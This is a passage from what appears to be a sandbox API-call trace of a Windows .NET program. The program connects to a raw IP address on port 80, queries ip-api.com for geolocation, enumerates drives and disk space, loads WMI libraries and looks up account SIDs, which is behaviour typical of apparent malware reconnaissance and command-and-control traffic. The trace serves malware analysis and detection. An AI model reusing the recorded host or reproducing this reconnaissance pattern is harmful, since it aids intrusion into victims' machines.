[108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x41e984*=0xa5c) returned 0x0 [0099.194] LocalFree (hMem=0x759d20) returned 0x0 [0099.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x41e998 | out: phkResult=0x41e998*=0x3ec) returned 0x0 [0099.196] RegQueryValueExW (in: hKey=0x3ec, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x41e9b4, lpData=0x0, lpcbData=0x41e9b0*=0x0 | out: lpType=0x41e9b4*=0x0, lpData=0x0, lpcbData=0x41e9b0*=0x0) returned 0x2 [0099.196] RegCloseKey (hKey=0x3ec) returned 0x0 [0099.197] GetProcAddress (hModule=0x77230000, lpProcName="WSAConnect") returned 0x7723cc3f [0099.197] WSAConnect (in: s=0x3cc, name=0x34360f0*(sa_family=2, sin_port=0x50, sin_addr="95.217.137.242"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0099.253] closesocket (s=0x3c8) returned 0 [0099.258] GetProcAddress (hModule=0x77230000, lpProcName="send") returned 0x77236f01 [0099.258] send (s=0x3cc, buf=0x3436c8c*, len=119, flags=0) returned 119 [0099.260] GetProcAddress (hModule=0x77230000, lpProcName="setsockopt") returned 0x772341b6 [0099.260] setsockopt (s=0x3cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0099.260] GetProcAddress (hModule=0x77230000, lpProcName="recv") returned 0x77236b0e [0099.260] recv (in: s=0x3cc, buf=0x3432124, len=4096, flags=0 | out: buf=0x3432124*) returned 1248 [0099.615] setsockopt (s=0x3cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0099.623] recv (in: s=0x3cc, buf=0x3432124, len=12, flags=0 | out: buf=0x3432124*) returned 5 [0099.624] SetEvent (hEvent=0x248) returned 1 [0099.691] QueryPerformanceCounter (in: lpPerformanceCount=0x41eb98 | out: lpPerformanceCount=0x41eb98*=21974486048) returned 1 [0099.691] SetEvent (hEvent=0x248) returned 1 [0099.695] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3c8 [0099.696] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3ec [0099.697] GetAddrInfoW (in: pNodeName="ip-api.com", pServiceName=0x0, pHints=0x41e8e0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x41e888 | out: ppResult=0x41e888*=0x5b649d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x5b649f8*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) returned 0 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] ResetEvent (hEvent=0xb8) returned 1 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] ResetEvent (hEvent=0xb8) returned 1 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] GetCurrentThreadId () returned 0xba4 [0099.699] SetEvent (hEvent=0xbc) returned 1 [0099.699] SetEvent (hEvent=0xb8) returned 1 [0099.700] CloseHandle (hObject=0x3f0) returned 1 [0099.702] GetCurrentThreadId () returned 0xba4 [0099.702] ResetEvent (hEvent=0xb8) returned 1 [0099.702] GetCurrentThreadId () returned 0xba4 [0099.702] GetCurrentThreadId () returned 0xba4 [0099.702] GetCurrentThreadId () returned 0xba4 [0099.702] GetCurrentThreadId () returned 0xba4 [0099.702] ResetEvent (hEvent=0xb8) returned 1 [0099.703] GetCurrentThreadId () returned 0xba4 [0099.703] GetCurrentThreadId () returned 0xba4 [0099.703] SetEvent (hEvent=0xbc) returned 1 [0099.703] SetEvent (hEvent=0xb8) returned 1 [0099.703] CloseHandle (hObject=0x3dc) returned 1 [0099.728] FreeAddrInfoW (pAddrInfo=0x5b649d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x5b649f8*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) [0099.729] WSAConnect (in: s=0x3c8, name=0x346c43c*(sa_family=2, sin_port=0x50, sin_addr="208.95.112.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0099.755] closesocket (s=0x3ec) returned 0 [0099.756] send (s=0x3c8, buf=0x3436c8c*, len=85, flags=0) returned 85 [0099.756] setsockopt (s=0x3c8, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0099.756] recv (in: s=0x3c8, buf=0x343110c, len=4096, flags=0 | out: buf=0x343110c*) returned 191 [0099.782] setsockopt (s=0x3c8, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0099.787] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0099.787] GetLogicalDrives () returned 0x4 [0099.789] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x41e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0099.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41ebb4) returned 1 [0099.796] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesEx") returned 0x0 [0099.801] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0099.801] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x41ec30 | out: lpFileInformation=0x41ec30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0099.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41ebb0) returned 1 [0099.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41ec18) returned 1 [0099.808] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceEx") returned 0x0 [0099.812] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0099.813] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x41ec44, lpTotalNumberOfBytes=0x41ec3c, lpTotalNumberOfFreeBytes=0x41ec34 | out: lpFreeBytesAvailableToCaller=0x41ec44, lpTotalNumberOfBytes=0x41ec3c, lpTotalNumberOfFreeBytes=0x41ec34) returned 1 [0099.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41ec14) returned 1 [0099.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41ec18) returned 1 [0099.813] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x41ec44, lpTotalNumberOfBytes=0x41ec3c, lpTotalNumberOfFreeBytes=0x41ec34 | out: lpFreeBytesAvailableToCaller=0x41ec44, lpTotalNumberOfBytes=0x41ec3c, lpTotalNumberOfFreeBytes=0x41ec34) returned 1 [0099.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41ec14) returned 1 [0099.850] SysReAllocStringLen (in: pbstr=0x41b5c8*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41b5c8*="kernel32.dll") returned 1 [0099.851] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0099.851] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0099.856] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0099.866] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0099.867] GetLastError () returned 0x0 [0099.867] SysReAllocStringLen (in: pbstr=0x41b130*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", len=0x7e | out: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux") returned 1 [0099.867] GetThreadLocale () returned 0x409 [0099.867] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0099.867] GetThreadLocale () returned 0x409 [0099.867] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0099.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41aeb4, lpFilePart=0x41aeb0 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", lpFilePart=0x41aeb0*="System.Management.ni.dll.aux") returned 0x7e [0099.868] SysReAllocStringLen (in: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", len=0x7e | out: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux") returned 1 [0099.868] SysReAllocStringLen (in: pbstr=0x41b0e0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", len=0x7e | out: pbstr=0x41b0e0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux") returned 1 [0099.868] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", cchLength=0x7e | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux") returned 0x7e [0099.868] SysReAllocStringLen (in: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux", len=0x7e | out: pbstr=0x41b130*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\4a1bd5a11e89160fb5f7669f6e27e129\\system.management.ni.dll.aux") returned 1 [0099.868] SetLastError (dwErrCode=0x0) [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] SetEvent (hEvent=0xbc) returned 1 [0099.869] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2fc [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.869] GetCurrentThreadId () returned 0xba4 [0099.870] GetCurrentThreadId () returned 0xba4 [0099.870] GetCurrentThreadId () returned 0xba4 [0099.870] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0099.870] GetCurrentThreadId () returned 0xba4 [0099.870] GetCurrentThreadId () returned 0xba4 [0099.870] GetCurrentThreadId () returned 0xba4 [0099.870] SetEvent (hEvent=0xbc) returned 1 [0099.870] ReadFile (in: hFile=0x3dc, lpBuffer=0x74e750, nNumberOfBytesToRead=0x2fc, lpNumberOfBytesRead=0x41b1e4, lpOverlapped=0x0 | out: lpBuffer=0x74e750*, lpNumberOfBytesRead=0x41b1e4*=0x2fc, lpOverlapped=0x0) returned 1 [0099.872] GetCurrentThreadId () returned 0xba4 [0099.872] ResetEvent (hEvent=0xb8) returned 1 [0099.872] GetCurrentThreadId () returned 0xba4 [0099.872] GetCurrentThreadId () returned 0xba4 [0099.872] GetCurrentThreadId () returned 0xba4 [0099.872] GetCurrentThreadId () returned 0xba4 [0099.872] ResetEvent (hEvent=0xb8) returned 1 [0099.873] GetCurrentThreadId () returned 0xba4 [0099.873] GetCurrentThreadId () returned 0xba4 [0099.873] SetEvent (hEvent=0xbc) returned 1 [0099.873] SetEvent (hEvent=0xb8) returned 1 [0099.873] CloseHandle (hObject=0x3dc) returned 1 [0099.934] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0099.934] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0099.935] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0099.938] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0099.939] GetCurrentThreadId () returned 0xba4 [0099.940] ResetEvent (hEvent=0xb8) returned 1 [0099.940] GetCurrentThreadId () returned 0xba4 [0099.940] GetCurrentThreadId () returned 0xba4 [0099.940] GetCurrentThreadId () returned 0xba4 [0099.940] GetCurrentThreadId () returned 0xba4 [0099.940] ResetEvent (hEvent=0xb8) returned 1 [0099.940] GetCurrentThreadId () returned 0xba4 [0099.940] GetCurrentThreadId () returned 0xba4 [0099.940] SetEvent (hEvent=0xbc) returned 1 [0099.940] SetEvent (hEvent=0xb8) returned 1 [0099.940] CloseHandle (hObject=0x3dc) returned 1 [0099.964] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0099.964] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0099.964] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0099.969] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0099.970] GetCurrentThreadId () returned 0xba4 [0099.970] ResetEvent (hEvent=0xb8) returned 1 [0099.970] GetCurrentThreadId () returned 0xba4 [0099.970] GetCurrentThreadId () returned 0xba4 [0099.971] GetCurrentThreadId () returned 0xba4 [0099.971] GetCurrentThreadId () returned 0xba4 [0099.971] ResetEvent (hEvent=0xb8) returned 1 [0099.971] GetCurrentThreadId () returned 0xba4 [0099.971] GetCurrentThreadId () returned 0xba4 [0099.971] SetEvent (hEvent=0xbc) returned 1 [0099.971] SetEvent (hEvent=0xb8) returned 1 [0099.971] CloseHandle (hObject=0x3dc) returned 1 [0099.974] SysReAllocStringLen (in: pbstr=0x41a6e8*=0x0, psz="System.Management.ni.dll", len=0x18 | out: pbstr=0x41a6e8*="System.Management.ni.dll") returned 1 [0099.975] CharLowerBuffW (in: lpsz="System.Management.ni.dll", cchLength=0x18 | out: lpsz="system.management.ni.dll") returned 0x18 [0099.975] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\4a1bd5a11e89160fb5f7669f6e27e129\\System.Management.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x74610000 [0099.998] GetLastError () returned 0x0 [0100.055] CoTaskMemAlloc (cb=0x20c) returned 0x75a330 [0100.056] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x75a330 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0100.056] CoTaskMemFree (pv=0x75a330) [0100.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x41e628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.066] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ec [0100.069] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0100.071] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eb70 | out: ppv=0x41eb70*=0x72015c) returned 0x0 [0100.077] GetCurrentThreadId () returned 0xba4 [0100.077] ResetEvent (hEvent=0xb8) returned 1 [0100.077] GetCurrentThreadId () returned 0xba4 [0100.077] GetCurrentThreadId () returned 0xba4 [0100.077] GetCurrentThreadId () returned 0xba4 [0100.077] GetCurrentThreadId () returned 0xba4 [0100.077] ResetEvent (hEvent=0xb8) returned 1 [0100.078] GetCurrentThreadId () returned 0xba4 [0100.078] GetCurrentThreadId () returned 0xba4 [0100.078] SetEvent (hEvent=0xbc) returned 1 [0100.078] SetEvent (hEvent=0xb8) returned 1 [0100.078] CloseHandle (hObject=0x3f4) returned 1 [0100.079] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=40, lpWideCharStr=0x41d610, cchWideChar=2047 | out: lpWideCharStr="API-MS-Win-Security-LSALookup-L1-1-0.dll") returned 40 [0100.079] SysReAllocStringLen (in: pbstr=0x41e614*=0x0, psz="API-MS-Win-Security-LSALookup-L1-1-0.dll", len=0x28 | out: pbstr=0x41e614*="API-MS-Win-Security-LSALookup-L1-1-0.dll") returned 1 [0100.079] CharLowerBuffW (in: lpsz="API-MS-Win-Security-LSALookup-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-security-lsalookup-l1-1-0.dll") returned 0x28 [0100.079] LoadLibraryExA (lpLibFileName="API-MS-Win-Security-LSALookup-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0100.080] GetLastError () returned 0x0 [0100.080] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e600*=0x76d11074, NumberOfBytesToProtect=0x41e604, NewAccessProtection=0x4, OldAccessProtection=0x41e638 | out: BaseAddress=0x41e600*=0x76d11000, NumberOfBytesToProtect=0x41e604, OldAccessProtection=0x41e638*=0x20) returned 0x0 [0100.081] GetCurrentProcess () returned 0xffffffff [0100.081] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e600*=0x76d11074, NumberOfBytesToProtect=0x41e604, NewAccessProtection=0x20, OldAccessProtection=0x41e638 | out: BaseAddress=0x41e600*=0x76d11000, NumberOfBytesToProtect=0x41e604, OldAccessProtection=0x41e638*=0x4) returned 0x0 [0100.081] GetCurrentProcess () returned 0xffffffff [0100.081] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e600*=0x76d11088, NumberOfBytesToProtect=0x41e604, NewAccessProtection=0x4, OldAccessProtection=0x41e638 | out: BaseAddress=0x41e600*=0x76d11000, NumberOfBytesToProtect=0x41e604, OldAccessProtection=0x41e638*=0x20) returned 0x0 [0100.081] GetCurrentProcess () returned 0xffffffff [0100.081] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e600*=0x76d11088, NumberOfBytesToProtect=0x41e604, NewAccessProtection=0x20, OldAccessProtection=0x41e638 | out: BaseAddress=0x41e600*=0x76d11000, NumberOfBytesToProtect=0x41e604, OldAccessProtection=0x41e638*=0x4) returned 0x0 [0100.082] GetProcAddress (hModule=0x76d10000, lpProcName="LookupAccountSidLocalW") returned 0x76d205da [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] ResetEvent (hEvent=0xb8) returned 1 [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] ResetEvent (hEvent=0xb8) returned 1 [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] GetCurrentThreadId () returned 0xba4 [0100.083] SetEvent (hEvent=0xbc) returned 1 [0100.083] SetEvent (hEvent=0xb8) returned 1 [0100.083] CloseHandle (hObject=0x3f8) returned 1 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] ResetEvent (hEvent=0xb8) returned 1 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] ResetEvent (hEvent=0xb8) returned 1 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] SetEvent (hEvent=0xbc) returned 1 [0100.084] SetEvent (hEvent=0xb8) returned 1 [0100.084] CloseHandle (hObject=0x3f4) returned 1 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] ResetEvent (hEvent=0xb8) returned 1 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] ResetEvent (hEvent=0xb8) returned 1 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.084] GetCurrentThreadId () returned 0xba4 [0100.085] SetEvent (hEvent=0xbc) returned 1 [0100.085] SetEvent (hEvent=0xb8) returned 1 [0100.085] CloseHandle (hObject=0x3f8) returned 1 [0100.087] GetCurrentThreadId () returned 0xba4 [0100.087] ResetEvent (hEvent=0xb8) returned 1 [0100.088] GetCurrentThreadId () returned 0xba4 [0100.088] GetCurrentThreadId () returned 0xba4 [0100.088] GetCurrentThreadId () returned 0xba4 [0100.088] GetCurrentThreadId () returned 0xba4 [0100.088] ResetEvent (hEvent=0xb8) returned 1 [0100.088] GetCurrentThreadId () returned 0xba4 [0100.088] GetCurrentThreadId () returned 0xba4 [0100.088] SetEvent (hEvent=0xbc) returned 1 [0100.088] SetEvent (hEvent=0xb8) returned 1 [0100.088] CloseHandle (hObject=0x3fc) returned 1 [0100.322] GetCurrentThreadId () returned 0xba4 [0100.322] ResetEvent (hEvent=0xb8) returned 1 [0100.322] GetCurrentThreadId () returned 0xba4 [0100.322] GetCurrentThreadId () returned 0xba4 [0100.322] GetCurrentThreadId () returned 0xba4 [0100.323] GetCurrentThreadId () returned 0xba4 [0100.323] ResetEvent (hEvent=0xb8) returned 1 [0100.323] GetCurrentThreadId () returned 0xba4 [0100.323] GetCurrentThreadId () returned 0xba4 [0100.323] SetEvent (hEvent=0xbc) returned 1 [0100.323] SetEvent (hEvent=0xb8) returned 1 [0100.323] CloseHandle (hObject=0x40c) returned 1 [0100.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x41de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0100.337] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibrary") returned 0x0 [0100.345] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0100.346] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=63, lpWideCharStr=0x41d2b0, cchWideChar=2047 | out: lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll⮠s⮠s휐A\x03") returned 63 [0100.346] SysReAllocStringLen (in: pbstr=0x41e2b4*=0x0, psz="wminet_utils.dll", len=0x10 | out: pbstr=0x41e2b4*="wminet_utils.dll") returned 1 [0100.346] CharLowerBuffW (in: lpsz="wminet_utils.dll", cchLength=0x10 | out: lpsz="wminet_utils.dll") returned 0x10 [0100.346] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x745f0000 [0100.507] GetLastError () returned 0x0 [0100.507] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f6068, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x4, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x2) returned 0x0 [0100.508] GetCurrentProcess () returned 0xffffffff [0100.508] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f6068, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x2, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x4) returned 0x0 [0100.508] GetCurrentProcess () returned 0xffffffff [0100.508] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f606c, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x4, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x2) returned 0x0 [0100.508] GetCurrentProcess () returned 0xffffffff [0100.508] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f606c, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x2, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x4) returned 0x0 [0100.509] GetCurrentProcess () returned 0xffffffff [0100.509] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f6078, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x4, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x2) returned 0x0 [0100.509] GetCurrentProcess () returned 0xffffffff [0100.509] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f6078, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x2, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x4) returned 0x0 [0100.509] GetCurrentProcess () returned 0xffffffff [0100.509] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f607c, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x4, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x2) returned 0x0 [0100.510] GetCurrentProcess () returned 0xffffffff [0100.510] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f607c, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x2, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, 